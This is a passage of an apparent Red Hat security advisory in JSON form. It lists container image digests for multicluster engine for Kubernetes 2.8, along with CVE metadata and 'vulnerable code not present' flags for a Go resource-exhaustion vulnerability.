"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-58183",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-10-29T23:01:50.573951+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
